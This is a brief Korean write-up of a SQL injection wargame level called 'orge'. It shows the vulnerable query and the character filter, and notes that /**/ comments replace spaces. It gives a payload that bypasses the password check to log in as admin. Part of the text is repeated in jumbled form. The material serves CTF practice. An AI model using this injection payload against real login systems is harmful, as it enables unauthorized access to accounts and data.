Query
1
select id from prob_orge where id='guest' and pw='{$_GET[pw]}'
Protection
preg_match
prob문자열_.()orand
Analysis
- 공백 문자 대신 주석
/**/을 사용할 수 있다.
Payload
1
?pw='or/**/id='admin'/**/%23
1
select id from prob_orge where id='guest' and pw='{$_GET[pw]}'
prob 문자열_.()orand/**/을 사용할 수 있다.1
?pw='or/**/id='admin'/**/%23
A new version of content is available.